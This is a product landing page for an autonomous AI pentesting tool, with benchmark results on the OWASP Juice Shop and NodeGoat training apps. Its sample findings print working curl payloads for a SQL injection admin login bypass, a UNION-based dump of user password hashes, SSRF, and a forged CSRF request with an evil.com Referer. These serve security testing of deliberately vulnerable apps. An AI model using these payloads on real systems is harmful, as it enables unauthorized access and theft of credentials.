Autonomous red-team ensemble · v0.4 preview

Pentest any web app.
No source code.
No configuration.
Just a URL.

Vexilium is a black-box AI pentester. Point it at any web app or API, and an ensemble of two engines (a deep single-session agent and a parallel red team) returns verified exploits. Every finding ships with a runnable curl. Source code never leaves your perimeter, because it's never touched.

No spam. We email once when your slot opens.

$ python -m agent.main --ensemble --target https://your-app.com
↳ ~10 minutes later
$ cat report.md
→ 11 verified exploits, 11 curl reproducers, 1 executive summary▍

87 seconds · live capture

One URL.
Eleven verified exploits.

Real run, sped 10×. Captions are diegetic: the agent's own reasoning, payloads, and verifier outcomes. Nothing is cherry-picked or replayed. This capture is the deep single-engine run; the full ensemble adds a parallel red team for the numbers below.

Headline numbers

unique verified exploits across two web stacks, ensemble of two engines

Juice Shop 11 · NodeGoat 8

~10min

average runtime, fully autonomous, no human input

deep agent + red team

lines of source code accessed. Pure black-box.

vs. Shannon · vs. XBOW

Where the coverage comes from

OWASP Juice Shop

11 unique verified

deep agent 8 · red team 4 · found by both 1

OWASP NodeGoat

8 unique verified

deep agent 6 · red team 5 · found by both 3

Neither engine alone finds the full set. The deep agent's persistent session catches stateful, chained bugs (server-side JS injection → RCE), while the red team's parallel specialists catch breadth (SSRF, NoSQL injection, broken access control on endpoints the deep agent never reached). The ensemble reports their deduplicated union.

Same target. Same conditions. No human config.

Tool	Target	Runtime	Verified active exploits
Vexilium · ensemble	OWASP Juice Shop	~10 min · two engines	11
Vexilium · ensemble	OWASP NodeGoat	~10 min · two engines	8
OWASP ZAP baseline	Juice Shop	~5 min	0 (10 passive)
Nuclei v3.8 · 6,618 templates	Juice Shop	7m 32s	0 (1 passive)

Industry-standard scanners (same network, same machine, default config) found zero active exploits. Across 14,000+ requests and 6,618 templates, Nuclei matched a single passive metrics endpoint. Vexilium's ensemble landed 19 working exploits across two unrelated web stacks, spanning auth bypass, SQLi, SSRF, NoSQL injection, IDOR, CSRF, and server-side JS injection → RCE.

How it works · ensemble

Two engines. One verified union.

Recon and auth run once and share a session. Then two engines attack the same surface from different angles, one for depth, one for breadth, and a critic plus a deterministic verifier merge what survives into a single deduplicated report.

01 / RECON + AUTH

Map once. Log in once.

A recon agent fingerprints the framework and enumerates the API surface; an auth agent establishes one session and shares it on a blackboard. Every request is scope-locked to the target's host:port at the tool layer.

→ GET /api/Products
→ POST /rest/user/login (session shared)
→ scope locked: host:port

02 / TWO ENGINES

Depth and breadth, in parallel.

A single deep-session agent chains multi-step attacks down one path; a red team of specialists sweeps the surface in parallel. Different angles, same target: the union is larger than either alone.

deep agent → SSJI → RCE /contributions
red team → SSRF, NoSQL, broken-access ×N
↳ low overlap, wide coverage

03 / MERGE + VERIFY

Prove it. Then dedupe.

A critic adversarially challenges every candidate; a per-class verifier rejects anything without observable exploit evidence. Survivors merge into one report, tagged by which engine found each.

VERIFIED sqli /rest/user/login [deep]
VERIFIED ssrf /research [red team]
↳ merged · 11 unique · 1 found by both

The moat is the data. Every customer run logs (target_fingerprint, payload, verifier_outcome). Binary signal, not noisy chat traces. That dataset trains specialist 7B–32B models that beat frontier on cost and latency for this narrow task. Open-source tools can replicate the agent; they cannot replicate the dataset.

The attack surface

Every endpoint is a pixel.
Two engines map the whole sphere.

Hover to disturb the surface. The deep agent drills one path to the core; the red team sweeps the perimeter in parallel. Together they leave no facet untested.

Sample of last run

Verified findings.
Working curl reproducers, every time.

SQLi · auth bypass Juice Shop · turn 6

Admin login bypassed with one string

' OR 1=1-- on /rest/user/login returns a valid admin JWT. Role admin, full access.

$ curl -X POST localhost:3000/rest/user/login \
-H 'Content-Type: application/json' \
-d '{"email":"' OR 1=1--","password":"x"}'
↳ {"authentication":{"token":"eyJ0eXA..."}}

UNION SQLi · data exfil Juice Shop · turn 13

Every user's password hash, exfiltrated

UNION SELECT on /rest/products/search leaks the full Users table: emails, MD5 hashes, roles for all 23 accounts.

$ curl "localhost:3000/rest/products/search?q=apple')) UNION SELECT id,email,password,role,4,5,6,7,8,9 FROM Users--"
↳ 23 rows · admin@juice-sh.op · 0192023a7bbd...

SSRF · internal proxy NodeGoat · turn 18

Server fetches arbitrary URLs on demand

/research?url= proxies any URL through the server. Internal recon, data exfil via internal endpoints, full blind-SSRF surface.

$ curl "localhost:4000/research?url=http://localhost:4000/dashboard"
↳ <internal dashboard HTML returned>

CSRF · state change NodeGoat · turn 15

Cross-origin POST modifies retirement allocations

/contributions accepts forged POSTs with attacker Referer and no CSRF token. The agent quoted the commented-out fix from the page source as evidence.

$ curl -X POST localhost:4000/contributions \
-H 'Referer: http://evil.com/csrf.html' \
-d 'preTax=99&roth=0&afterTax=0'
↳ HTTP 200 · "Contributions updated successfully."

Why black-box

Source-code AI pentesters serve the easy half of the market.
We serve the rest.

vs. Shannon (white-box)

Requires source-code ingestion. Excludes external pentest, vendor-risk review, bug-bounty research, and every regulated buyer that can't ship source to a US AI vendor.

vs. XBOW (enterprise findings)

Enterprise SaaS sells reports to security teams. We ship verified exploits with curl reproducers into developer workflow: PR-integrated, per-commit, continuous.

vs. ZAP / Nuclei (static)

Template-based scanners find missing headers and metrics endpoints. They cannot bypass auth, exfiltrate data, or chain attacks. We consistently do all three.

Pentest any web app.
No source code.
No configuration.
Just a URL.

One URL.
Eleven verified exploits.

Two engines. One verified union.

Map once. Log in once.

Depth and breadth, in parallel.

Prove it. Then dedupe.

Every endpoint is a pixel.
Two engines map the whole sphere.

Verified findings.
Working curl reproducers, every time.

Admin login bypassed with one string

Every user's password hash, exfiltrated

Server fetches arbitrary URLs on demand

Cross-origin POST modifies retirement allocations

Source-code AI pentesters serve the easy half of the market.
We serve the rest.

Get early access.
Be first in line when Vexilium opens.

Book a 30-minute walkthrough.

Pentest any web app. No source code. No configuration. Just a URL.

One URL. Eleven verified exploits.

Two engines. One verified union.

Map once. Log in once.

Depth and breadth, in parallel.

Prove it. Then dedupe.

Every endpoint is a pixel. Two engines map the whole sphere.

Verified findings. Working curl reproducers, every time.

Admin login bypassed with one string

Every user's password hash, exfiltrated

Server fetches arbitrary URLs on demand

Cross-origin POST modifies retirement allocations

Source-code AI pentesters serve the easy half of the market. We serve the rest.

Get early access. Be first in line when Vexilium opens.

Pentest any web app.
No source code.
No configuration.
Just a URL.

One URL.
Eleven verified exploits.

Every endpoint is a pixel.
Two engines map the whole sphere.

Verified findings.
Working curl reproducers, every time.

Source-code AI pentesters serve the easy half of the market.
We serve the rest.

Get early access.
Be first in line when Vexilium opens.